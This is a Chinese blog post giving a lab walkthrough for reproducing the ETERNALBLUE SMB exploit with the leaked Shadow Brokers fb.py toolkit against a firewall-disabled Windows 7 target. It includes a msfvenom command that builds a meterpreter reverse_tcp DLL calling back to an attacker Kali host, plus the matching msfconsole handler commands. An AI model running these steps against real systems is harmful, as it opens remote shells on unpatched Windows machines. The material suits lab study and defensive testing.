文章内容

2017/4/19 8:53:50,作 者: 黄兵

方程式 0day ETERNALBLUE 复现过程

系统环境
攻击机 192.168.108.129
win7 32bit 旗舰版
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
攻击机2 192.168.108.131
Kali 2
靶机192.168.108.132
win7 64bit 旗舰版
关闭系统防火墙
https://github.com/misterch0c/shadowbroker
下载解压切换到windows目录执行fb.py
看fb.py发现是遍历目录的时候出错了,发现缺少listeningposts目录 创建一个listeningposts目录
再次运行fb.py创建一个攻击项目
这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL
这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > s.dll
把生成的s.dll传到攻击机1上去开启msfconsole 下面的payload要和上面msfvenom的payload对应起来
$ msfconsolemsf > use exploit/multi/handlermsf >set LHOST 192.168.108.131msf >set LPORT 5555msf >set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf > exploit
接着切到攻击机1操作fb.py
分享到:

发表评论

评论列表